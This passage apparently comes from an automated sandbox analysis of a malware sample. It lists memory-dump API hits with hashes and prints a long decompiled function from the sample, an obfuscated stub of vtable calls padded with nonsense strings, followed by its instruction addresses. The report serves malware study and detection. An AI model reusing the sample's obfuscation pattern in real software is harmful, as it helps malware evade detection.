                                  • LdrInitializeThunk.NTDLL(00000000,?,00000041,00000252,?,02285BA4,?,?,?,00000852,?,?,000009D9,00000000,?,00400000), ref: 0228588D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d579c48214593000ca2c745a3ef9db19a778d4e5b45a3520d2f1f974291b6046
                                  • Instruction ID: e042b85b0e8e396677f8943a00278cd45d53a91ef70ef370de05a39330209ab4
                                  • Opcode Fuzzy Hash: d579c48214593000ca2c745a3ef9db19a778d4e5b45a3520d2f1f974291b6046
                                  • Instruction Fuzzy Hash: 68018681A55A8783ED04A44160425D93B1051573A1BBADBB3CC0E17E9DB14D8A3FBBE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02288E45, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022887BE,00000040,02280914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02288E5E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EA74, Relevance: 155.1, APIs: 50, Strings: 38, Instructions: 1080COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E0040EA74(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v32;
				short _v36;
				long long _v44;
				long long _v52;
				short _v56;
				short _v60;
				short _v64;
				char _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				long long _v88;
				short _v92;
				intOrPtr _v96;
				char _v100;
				short _v104;
				intOrPtr _v108;
				char _v112;
				long long _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				void* _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				signed int _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				char _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _t582;
				signed int _t587;
				signed int _t600;
				signed int _t619;
				signed int _t627;
				signed int _t647;
				signed int _t664;
				signed int _t673;
				signed int _t684;
				signed int _t721;
				signed int _t738;
				signed int _t746;
				signed int _t751;
				signed int _t769;
				signed int _t773;
				signed int _t797;
				signed int _t804;
				signed int _t812;
				signed int _t817;
				signed int _t827;
				signed int _t834;
				signed int _t837;
				void* _t841;
				char* _t853;
				char* _t855;
				char* _t856;
				char* _t858;
				char* _t859;
				char* _t862;
				void* _t881;
				void* _t883;
				intOrPtr _t884;
				void* _t885;
				void* _t886;
				long long* _t887;
				long long* _t888;
				long long* _t889;

				_t884 = _t883 - 0xc;
				 *[fs:0x0] = _t884;
				L004014F0();
				_v16 = _t884;
				_v12 = 0x401268;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0x000000fe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4014f6, _t881);
				if( *0x41333c != 0) {
					_v208 = 0x41333c;
				} else {
					_push(0x41333c);
					_push(0x40276c);
					L004016B8();
					_v208 = 0x41333c;
				}
				_t12 =  &_v208; // 0x41333c
				_v184 =  *((intOrPtr*)( *_t12));
				_t582 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v132);
				asm("fclex");
				_v188 = _t582;
				if(_v188 >= 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40275c);
					_push(_v184);
					_push(_v188);
					L004016B2();
					_v212 = _t582;
				}
				_v192 = _v132;
				_t587 =  *((intOrPtr*)( *_v192 + 0x78))(_v192,  &_v136);
				asm("fclex");
				_v196 = _t587;
				if(_v196 >= 0) {
					_v216 = _v216 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x40277c);
					_push(_v192);
					_push(_v196);
					L004016B2();
					_v216 = _t587;
				}
				_v36 = _v136;
				L004016AC();
				_v160 =  *0x401264;
				_v156 =  *0x401260;
				_v172 =  *0x401258;
				_v72 =  *0x401254;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, 0x937, 0x1c4a,  &_v172,  &_v156, 0x1ea6f2,  &_v132, 0x3fc073,  &_v160,  &_v164);
				_v72 = _v164;
				_v140 = 0x23bb;
				_v136 = 0x4c55;
				_t600 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v136,  &_v140);
				_v184 = _t600;
				if(_v184 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v220 = _t600;
				}
				_v140 = 0x4a54;
				L004016A6();
				L004016A6();
				_v172 = 0x20a09d70;
				_v168 = 0x5afe;
				_v136 = 0xdbf;
				_v156 =  *0x401250;
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4,  &_v156,  &_v136,  &_v172,  &_v124, 0x6a5f8a,  &_v128,  &_v140, L"nonleaded");
				L004016A0();
				_t885 = _t884 + 0xc;
				_v160 =  *0x40124c;
				_v140 = 0x3cfc;
				_v136 = 0x4fc;
				_v156 =  *0x401248;
				_t619 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v156,  &_v136,  &_v140, 0x5930, 0x632350f0, 0x5afb,  &_v160, 0x6faf64,  &_v164, 2,  &_v124,  &_v128);
				_v184 = _t619;
				if(_v184 >= 0) {
					_v224 = _v224 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v224 = _t619;
				}
				_v68 = _v164;
				_v136 = 0xa93;
				_v160 =  *0x401244;
				_v156 =  *0x401240;
				_t627 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x4319,  &_v156,  &_v160,  &_v136, 0x534262, L"COORDINATORY", 0xafdb4ec0, 0x5af6,  &_v172);
				_v184 = _t627;
				if(_v184 >= 0) {
					_v228 = _v228 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v228 = _t627;
				}
				_v100 = _v172;
				_v96 = _v168;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4);
				_v172 = 0xb73d9430;
				_v168 = 0x5afa;
				_v156 = 0x71b51e;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4,  &_v156, 0x646b, L"Rapportopgaveer",  &_v172,  &_v136);
				_v64 = _v136;
				_v156 = 0x19a9ec;
				_v136 = 0x74b1;
				L004016A6();
				_v172 =  *0x401238;
				_t647 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, L"UDSENDELSESLEDERENS", L"Princesslike2",  &_v172, 0x75993920, 0x5b05,  &_v124, 0x7965ca,  &_v136, 0x6c83,  &_v156,  &_v180);
				_v184 = _t647;
				if(_v184 >= 0) {
					_v232 = _v232 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v232 = _t647;
				}
				_v32 = _v180;
				_v28 = _v176;
				L0040169A();
				L004016A6();
				_v136 = 0x7f6;
				_v160 = 0x85e0a5;
				L004016A6();
				_v156 = 0x81e999;
				 *((intOrPtr*)( *_a4 + 0x758))(_a4, 0x5b262c,  &_v156, 0x4de434a0, 0x5b07,  &_v124, L"Ciceronically",  &_v160,  &_v136,  &_v128,  &_v140);
				_v76 = _v140;
				L004016A0();
				_t886 = _t885 + 0xc;
				_t664 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 2,  &_v124,  &_v128);
				_v184 = _t664;
				if(_v184 >= 0) {
					_v236 = _v236 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v236 = _t664;
				}
				_v152 = 0x2e49;
				_v172 =  *0x401230;
				_v148 = 0x47eb;
				_v144 = 0x4944;
				_v140 = 0x4cd7;
				_v136 = 0x72a9;
				_t673 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v136, 0x20ce,  &_v140,  &_v144, 0x16c328,  &_v148,  &_v172,  &_v152);
				_v184 = _t673;
				if(_v184 >= 0) {
					_v240 = _v240 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v240 = _t673;
				}
				_v136 = 0x58da;
				 *((intOrPtr*)( *_a4 + 0x75c))(_a4, L"brysthulernes",  &_v136,  &_v140);
				_v92 = _v140;
				L004016A6();
				L004016A6();
				_t684 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v124, 0x1ea6f2,  &_v128);
				_v184 = _t684;
				if(_v184 >= 0) {
					_v244 = _v244 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v244 = _t684;
				}
				L004016A0();
				_t887 = _t886 + 0xc;
				L004016A6();
				_v160 = 0x4c041c;
				_v172 = 0x950d78b0;
				_v168 = 0x5af7;
				_t853 =  &_v124;
				L004016A6();
				_v156 = 0x6b48d8;
				 *_t887 =  *0x401228;
				 *_t887 =  *0x401220;
				 *((intOrPtr*)( *_a4 + 0x760))(_a4, _t853, _t853,  &_v156,  &_v124, _t853, _t853,  &_v172,  &_v160, 0x2df651, 0x6ba0, 0x106f,  &_v128, 2,  &_v124,  &_v128);
				L004016A0();
				_t888 = _t887 + 0xc;
				_v156 = 0x4bf5be;
				L004016A6();
				_t855 =  &_v124;
				L004016A6();
				_v172 = 0x7df0fff0;
				_v168 = 0x5afa;
				 *_t888 =  *0x401218;
				 *((intOrPtr*)( *_a4 + 0x764))(_a4, 0x55d653,  &_v172, 0x5d62, 0x329d,  &_v124, _t855, _t855,  &_v128, L"Neapolitanernes9", L"Femaaret1",  &_v156, 2,  &_v124,  &_v128);
				L004016A0();
				_t889 = _t888 + 0xc;
				_v144 = 0x6589;
				_v140 = 0x592a;
				_v136 = 0xc7f;
				_v172 = 0xcd64b2a0;
				_v168 = 0x5b06;
				 *_t889 =  *0x401210;
				 *_t889 =  *0x401208;
				 *((intOrPtr*)( *_a4 + 0x768))(_a4, 0x703d9a,  &_v172,  &_v136, 0x25b41f,  &_v140, _t855, _t855,  &_v144, _t855, L"BREGNEMOS",  &_v148, 2,  &_v124,  &_v128);
				_v60 = _v148;
				_v160 =  *0x401200;
				_v172 =  *0x4011f8;
				_v156 = 0x498bfd;
				_t721 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v156, L"MARMENNILL",  &_v172, 0x3fdd2e,  &_v160,  &_v180);
				_v184 = _t721;
				if(_v184 >= 0) {
					_v248 = _v248 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v248 = _t721;
				}
				_v112 = _v180;
				_v108 = _v176;
				_v160 =  *0x4011f0;
				_v136 = 0x668f;
				_v156 = 0x61043c;
				_v180 = 0x31a5ae00;
				_v176 = 0x5afc;
				_v172 = 0x85536c70;
				_v168 = 0x5afe;
				 *_t889 =  *0x4011e8;
				 *((intOrPtr*)( *_a4 + 0x76c))(_a4,  &_v172, _t855, _t855,  &_v180, 0x278f,  &_v156, 0x8a7d0750, 0x5aff,  &_v136,  &_v160, 0x4691,  &_v140);
				_v56 = _v140;
				_v156 =  *0x4011e0;
				_t738 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v156, 0x64817a,  &_v172);
				_v184 = _t738;
				if(_v184 >= 0) {
					_v252 = _v252 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v252 = _t738;
				}
				_v52 = _v172;
				_v160 = 0x4186f1;
				_v144 = 0x7308;
				_v140 = 0x3cf0;
				_v156 = 0x80397e;
				_v136 = 0x67df;
				 *_t889 =  *0x4011d8;
				_t746 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, L"STRUKTURELLES", _t855, _t855,  &_v136, 0x7c54d2,  &_v156,  &_v140, 0x4d1ba3,  &_v144, 0x22e85140, 0x5b03,  &_v160);
				_v184 = _t746;
				if(_v184 >= 0) {
					_v256 = _v256 & 0x00000000;
				} else {
					_push(0x71c);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v256 = _t746;
				}
				_v156 =  *0x4011d4;
				 *_t889 =  *0x4011d0;
				_t751 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, 0x8a636, L"Unimputed7", _t855,  &_v156,  &_v172);
				_v184 = _t751;
				if(_v184 >= 0) {
					_v260 = _v260 & 0x00000000;
				} else {
					_push(0x720);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v260 = _t751;
				}
				_v88 = _v172;
				_v172 =  *0x4011c8;
				_v156 = 0x3f4761;
				 *_t889 =  *0x4011c0;
				_t377 =  &_v156; // 0x3f4761
				 *_t889 =  *0x4011b8;
				 *((intOrPtr*)( *_a4 + 0x770))(_a4, 0x4855a1f0, 0x5afc, _t855, _t855, _t377, _t855,  &_v172,  &_v180);
				_v120 = _v180;
				_v160 = 0x161041;
				_v136 = 0x5ce9;
				_v172 = 0x7df0fff0;
				_v168 = 0x5afa;
				_v156 =  *0x4011b0;
				 *_t889 =  *0x401218;
				_t391 =  &_v156; // 0x3f4761
				 *((intOrPtr*)( *_a4 + 0x774))(_a4, _t391, _t855, _t855,  &_v172,  &_v136, 0x65f8fe, 0x26ce, 0x1837,  &_v160);
				_v172 =  *0x4011a8;
				_v156 = 0x61246;
				_t769 =  *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v156, L"mindedigtet",  &_v172);
				_v184 = _t769;
				if(_v184 >= 0) {
					_v264 = _v264 & 0x00000000;
				} else {
					_push(0x724);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v264 = _t769;
				}
				_t773 =  *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v136);
				_v184 = _t773;
				if(_v184 >= 0) {
					_v268 = _v268 & 0x00000000;
				} else {
					_push(0x728);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v268 = _t773;
				}
				_v104 = _v136;
				 *((intOrPtr*)( *_a4 + 0x778))(_a4);
				_v136 = 0x6da8;
				_t856 =  &_v124;
				L004016A6();
				_v156 = 0x2cc3e3;
				 *_t889 =  *0x4011a0;
				 *_t889 =  *0x401198;
				 *((intOrPtr*)( *_a4 + 0x77c))(_a4,  &_v156, _t856, _t856,  &_v124, _t856,  &_v136);
				L0040169A();
				_v136 = 0xb3e;
				 *((intOrPtr*)( *_a4 + 0x780))(_a4, 0x4ff843, L"ACROMIOCLAVICULAR",  &_v136, 0x6800);
				_v160 =  *0x401190;
				_t858 =  &_v124;
				L004016A6();
				_v180 =  *0x401188;
				_v156 =  *0x401184;
				_v172 = 0xb7b19540;
				_v168 = 0x5b06;
				_v136 = 0x435;
				 *_t889 =  *0x401180;
				 *_t889 =  *0x401178;
				_t797 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v136,  &_v172,  &_v156, 0xb598d620, 0x5b00,  &_v180, _t858, _t858,  &_v124, _t858,  &_v160,  &_v164);
				_v184 = _t797;
				if(_v184 >= 0) {
					_v272 = _v272 & 0x00000000;
				} else {
					_push(0x72c);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v272 = _t797;
				}
				_v80 = _v164;
				_t859 =  &_v124;
				L0040169A();
				 *((intOrPtr*)( *_a4 + 0x784))(_a4);
				_t804 =  *((intOrPtr*)( *_a4 + 0x730))(_a4);
				_v184 = _t804;
				if(_v184 >= 0) {
					_v276 = _v276 & 0x00000000;
				} else {
					_push(0x730);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v276 = _t804;
				}
				 *_t889 =  *0x401174;
				 *((intOrPtr*)( *_a4 + 0x788))(_a4, _t859, 0x5d86fe);
				_v156 =  *0x401170;
				_v136 = 0x61ea;
				_t812 =  *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v136,  &_v156, 0x60a7, 0x183aac);
				_v184 = _t812;
				if(_v184 >= 0) {
					_v280 = _v280 & 0x00000000;
				} else {
					_push(0x734);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v280 = _t812;
				}
				_v136 = 0x48e2;
				L004016A6();
				_t817 =  *((intOrPtr*)( *_a4 + 0x738))(_a4, L"UNGDOMSFNGSELS",  &_v124, 0x6da9aa, 0x1b6865, 0x81a23630, 0x5afc, 0x737aa,  &_v136);
				_v184 = _t817;
				if(_v184 >= 0) {
					_v284 = _v284 & 0x00000000;
				} else {
					_push(0x738);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v284 = _t817;
				}
				L0040169A();
				_v156 =  *0x4011f0;
				 *((intOrPtr*)( *_a4 + 0x78c))(_a4,  &_v156, 0x61043c,  &_v172);
				_v44 = _v172;
				_v136 = 0x4ecb;
				_v172 =  *0x401168;
				 *_t889 =  *0x401160;
				_t827 =  *((intOrPtr*)( *_a4 + 0x73c))(_a4,  &_v172,  &_v124, 0xfedb0060, 0x5af6, 0x64e5,  &_v136, 0x22ad);
				_v184 = _t827;
				if(_v184 >= 0) {
					_v288 = _v288 & 0x00000000;
				} else {
					_push(0x73c);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v288 = _t827;
				}
				_t862 =  &_v124;
				L004016A6();
				_v136 = 0x214d;
				_v156 = 0x665416;
				_v172 =  *0x401158;
				 *_t889 =  *0x401150;
				 *_t889 =  *0x401148;
				_t834 =  *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v172,  &_v156, _t862, _t862,  &_v136, _t862, _t862,  &_v124, 0x3b8b);
				_v184 = _t834;
				if(_v184 >= 0) {
					_v292 = _v292 & 0x00000000;
				} else {
					_push(0x740);
					_push(0x402594);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v292 = _t834;
				}
				L0040169A();
				_t837 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
				asm("fclex");
				_v184 = _t837;
				if(_v184 >= 0) {
					_v296 = _v296 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x402564);
					_push(_a4);
					_push(_v184);
					L004016B2();
					_v296 = _t837;
				}
				_t841 =  *((intOrPtr*)( *_a4 + 0x790))(_a4,  &_v156);
				_v8 = 0;
				asm("wait");
				_push(0x40fd19);
				return _t841;
			}









































































































                                  0x0040ea77
                                  0x0040ea86
                                  0x0040ea92
                                  0x0040ea9a
                                  0x0040ea9d
                                  0x0040eaaa
                                  0x0040eab2
                                  0x0040eabd
                                  0x0040eac7
                                  0x0040eae4
                                  0x0040eac9
                                  0x0040eac9
                                  0x0040eace
                                  0x0040ead3
                                  0x0040ead8
                                  0x0040ead8
                                  0x0040eaee
                                  0x0040eaf6
                                  0x0040eb0e
                                  0x0040eb11
                                  0x0040eb13
                                  0x0040eb20
                                  0x0040eb42
                                  0x0040eb22
                                  0x0040eb22
                                  0x0040eb24
                                  0x0040eb29
                                  0x0040eb2f
                                  0x0040eb35
                                  0x0040eb3a
                                  0x0040eb3a
                                  0x0040eb4c
                                  0x0040eb67
                                  0x0040eb6a
                                  0x0040eb6c
                                  0x0040eb79
                                  0x0040eb9b
                                  0x0040eb7b
                                  0x0040eb7b
                                  0x0040eb7d
                                  0x0040eb82
                                  0x0040eb88
                                  0x0040eb8e
                                  0x0040eb93
                                  0x0040eb93
                                  0x0040eba9
                                  0x0040ebb0
                                  0x0040ebbb
                                  0x0040ebc7
                                  0x0040ebd3
                                  0x0040ebf3
                                  0x0040ec1b
                                  0x0040ec27
                                  0x0040ec2a
                                  0x0040ec33
                                  0x0040ec52
                                  0x0040ec58
                                  0x0040ec65
                                  0x0040ec87
                                  0x0040ec67
                                  0x0040ec67
                                  0x0040ec6c
                                  0x0040ec71
                                  0x0040ec74
                                  0x0040ec7a
                                  0x0040ec7f
                                  0x0040ec7f
                                  0x0040ec8e
                                  0x0040ec9f
                                  0x0040ecac
                                  0x0040ecb1
                                  0x0040ecbb
                                  0x0040ecc5
                                  0x0040ecd4
                                  0x0040ed10
                                  0x0040ed20
                                  0x0040ed25
                                  0x0040ed2e
                                  0x0040ed34
                                  0x0040ed3d
                                  0x0040ed4c
                                  0x0040ed91
                                  0x0040ed97
                                  0x0040eda4
                                  0x0040edc6
                                  0x0040eda6
                                  0x0040eda6
                                  0x0040edab
                                  0x0040edb0
                                  0x0040edb3
                                  0x0040edb9
                                  0x0040edbe
                                  0x0040edbe
                                  0x0040edd3
                                  0x0040edd6
                                  0x0040ede5
                                  0x0040edf1
                                  0x0040ee34
                                  0x0040ee3a
                                  0x0040ee47
                                  0x0040ee69
                                  0x0040ee49
                                  0x0040ee49
                                  0x0040ee4e
                                  0x0040ee53
                                  0x0040ee56
                                  0x0040ee5c
                                  0x0040ee61
                                  0x0040ee61
                                  0x0040ee76
                                  0x0040ee7f
                                  0x0040ee8a
                                  0x0040ee90
                                  0x0040ee9a
                                  0x0040eea4
                                  0x0040eed5
                                  0x0040eee2
                                  0x0040eee6
                                  0x0040eef0
                                  0x0040ef01
                                  0x0040ef0c
                                  0x0040ef58
                                  0x0040ef5e
                                  0x0040ef6b
                                  0x0040ef8d
                                  0x0040ef6d
                                  0x0040ef6d
                                  0x0040ef72
                                  0x0040ef77
                                  0x0040ef7a
                                  0x0040ef80
                                  0x0040ef85
                                  0x0040ef85
                                  0x0040ef9a
                                  0x0040efa3
                                  0x0040efa9
                                  0x0040efb6
                                  0x0040efbb
                                  0x0040efc4
                                  0x0040efd6
                                  0x0040efdb
                                  0x0040f025
                                  0x0040f032
                                  0x0040f040
                                  0x0040f045
                                  0x0040f050
                                  0x0040f056
                                  0x0040f063
                                  0x0040f085
                                  0x0040f065
                                  0x0040f065
                                  0x0040f06a
                                  0x0040f06f
                                  0x0040f072
                                  0x0040f078
                                  0x0040f07d
                                  0x0040f07d
                                  0x0040f08c
                                  0x0040f09b
                                  0x0040f0a1
                                  0x0040f0aa
                                  0x0040f0b3
                                  0x0040f0bc
                                  0x0040f101
                                  0x0040f107
                                  0x0040f114
                                  0x0040f136
                                  0x0040f116
                                  0x0040f116
                                  0x0040f11b
                                  0x0040f120
                                  0x0040f123
                                  0x0040f129
                                  0x0040f12e
                                  0x0040f12e
                                  0x0040f13d
                                  0x0040f161
                                  0x0040f16e
                                  0x0040f17a
                                  0x0040f187
                                  0x0040f1a1
                                  0x0040f1a7
                                  0x0040f1b4
                                  0x0040f1d6
                                  0x0040f1b6
                                  0x0040f1b6
                                  0x0040f1bb
                                  0x0040f1c0
                                  0x0040f1c3
                                  0x0040f1c9
                                  0x0040f1ce
                                  0x0040f1ce
                                  0x0040f1e7
                                  0x0040f1ec
                                  0x0040f1f7
                                  0x0040f1fc
                                  0x0040f206
                                  0x0040f210
                                  0x0040f21f
                                  0x0040f222
                                  0x0040f227
                                  0x0040f25a
                                  0x0040f270
                                  0x0040f27b
                                  0x0040f28b
                                  0x0040f290
                                  0x0040f293
                                  0x0040f2a5
                                  0x0040f2af
                                  0x0040f2b2
                                  0x0040f2b7
                                  0x0040f2c1
                                  0x0040f2e8
                                  0x0040f30d
                                  0x0040f31d
                                  0x0040f322
                                  0x0040f325
                                  0x0040f32e
                                  0x0040f337
                                  0x0040f340
                                  0x0040f34a
                                  0x0040f367
                                  0x0040f379
                                  0x0040f3a3
                                  0x0040f3b0
                                  0x0040f3ba
                                  0x0040f3c6
                                  0x0040f3cc
                                  0x0040f404
                                  0x0040f40a
                                  0x0040f417
                                  0x0040f439
                                  0x0040f419
                                  0x0040f419
                                  0x0040f41e
                                  0x0040f423
                                  0x0040f426
                                  0x0040f42c
                                  0x0040f431
                                  0x0040f431
                                  0x0040f446
                                  0x0040f44f
                                  0x0040f458
                                  0x0040f45e
                                  0x0040f467
                                  0x0040f471
                                  0x0040f47b
                                  0x0040f485
                                  0x0040f48f
                                  0x0040f4d8
                                  0x0040f4ea
                                  0x0040f4f7
                                  0x0040f501
                                  0x0040f522
                                  0x0040f528
                                  0x0040f535
                                  0x0040f557
                                  0x0040f537
                                  0x0040f537
                                  0x0040f53c
                                  0x0040f541
                                  0x0040f544
                                  0x0040f54a
                                  0x0040f54f
                                  0x0040f54f
                                  0x0040f564
                                  0x0040f567
                                  0x0040f571
                                  0x0040f57a
                                  0x0040f583
                                  0x0040f58d
                                  0x0040f5d5
                                  0x0040f5e5
                                  0x0040f5eb
                                  0x0040f5f8
                                  0x0040f61a
                                  0x0040f5fa
                                  0x0040f5fa
                                  0x0040f5ff
                                  0x0040f604
                                  0x0040f607
                                  0x0040f60d
                                  0x0040f612
                                  0x0040f612
                                  0x0040f627
                                  0x0040f642
                                  0x0040f657
                                  0x0040f65d
                                  0x0040f66a
                                  0x0040f68c
                                  0x0040f66c
                                  0x0040f66c
                                  0x0040f671
                                  0x0040f676
                                  0x0040f679
                                  0x0040f67f
                                  0x0040f684
                                  0x0040f684
                                  0x0040f699
                                  0x0040f6a2
                                  0x0040f6a8
                                  0x0040f6c7
                                  0x0040f6ca
                                  0x0040f6d9
                                  0x0040f6ee
                                  0x0040f6fa
                                  0x0040f6fd
                                  0x0040f707
                                  0x0040f710
                                  0x0040f71a
                                  0x0040f72a
                                  0x0040f75c
                                  0x0040f75f
                                  0x0040f76e
                                  0x0040f77a
                                  0x0040f780
                                  0x0040f7a5
                                  0x0040f7ab
                                  0x0040f7b8
                                  0x0040f7da
                                  0x0040f7ba
                                  0x0040f7ba
                                  0x0040f7bf
                                  0x0040f7c4
                                  0x0040f7c7
                                  0x0040f7cd
                                  0x0040f7d2
                                  0x0040f7d2
                                  0x0040f7f0
                                  0x0040f7f6
                                  0x0040f803
                                  0x0040f825
                                  0x0040f805
                                  0x0040f805
                                  0x0040f80a
                                  0x0040f80f
                                  0x0040f812
                                  0x0040f818
                                  0x0040f81d
                                  0x0040f81d
                                  0x0040f833
                                  0x0040f83f
                                  0x0040f845
                                  0x0040f853
                                  0x0040f856
                                  0x0040f85b
                                  0x0040f873
                                  0x0040f882
                                  0x0040f894
                                  0x0040f89d
                                  0x0040f8a2
                                  0x0040f8c9
                                  0x0040f8d5
                                  0x0040f8e0
                                  0x0040f8e3
                                  0x0040f8ee
                                  0x0040f8fa
                                  0x0040f900
                                  0x0040f90a
                                  0x0040f914
                                  0x0040f932
                                  0x0040f941
                                  0x0040f972
                                  0x0040f978
                                  0x0040f985
                                  0x0040f9a7
                                  0x0040f987
                                  0x0040f987
                                  0x0040f98c
                                  0x0040f991
                                  0x0040f994
                                  0x0040f99a
                                  0x0040f99f
                                  0x0040f99f
                                  0x0040f9b4
                                  0x0040f9b7
                                  0x0040f9ba
                                  0x0040f9c7
                                  0x0040f9d5
                                  0x0040f9db
                                  0x0040f9e8
                                  0x0040fa0a
                                  0x0040f9ea
                                  0x0040f9ea
                                  0x0040f9ef
                                  0x0040f9f4
                                  0x0040f9f7
                                  0x0040f9fd
                                  0x0040fa02
                                  0x0040fa02
                                  0x0040fa1d
                                  0x0040fa28
                                  0x0040fa34
                                  0x0040fa3a
                                  0x0040fa63
                                  0x0040fa69
                                  0x0040fa76
                                  0x0040fa98
                                  0x0040fa78
                                  0x0040fa78
                                  0x0040fa7d
                                  0x0040fa82
                                  0x0040fa85
                                  0x0040fa8b
                                  0x0040fa90
                                  0x0040fa90
                                  0x0040fa9f
                                  0x0040fab0
                                  0x0040fae6
                                  0x0040faec
                                  0x0040faf9
                                  0x0040fb1b
                                  0x0040fafb
                                  0x0040fafb
                                  0x0040fb00
                                  0x0040fb05
                                  0x0040fb08
                                  0x0040fb0e
                                  0x0040fb13
                                  0x0040fb13
                                  0x0040fb25
                                  0x0040fb30
                                  0x0040fb51
                                  0x0040fb5d
                                  0x0040fb60
                                  0x0040fb6f
                                  0x0040fb97
                                  0x0040fba9
                                  0x0040fbaf
                                  0x0040fbbc
                                  0x0040fbde
                                  0x0040fbbe
                                  0x0040fbbe
                                  0x0040fbc3
                                  0x0040fbc8
                                  0x0040fbcb
                                  0x0040fbd1
                                  0x0040fbd6
                                  0x0040fbd6
                                  0x0040fbea
                                  0x0040fbed
                                  0x0040fbf2
                                  0x0040fbfb
                                  0x0040fc0b
                                  0x0040fc22
                                  0x0040fc34
                                  0x0040fc4d
                                  0x0040fc53
                                  0x0040fc60
                                  0x0040fc82
                                  0x0040fc62
                                  0x0040fc62
                                  0x0040fc67
                                  0x0040fc6c
                                  0x0040fc6f
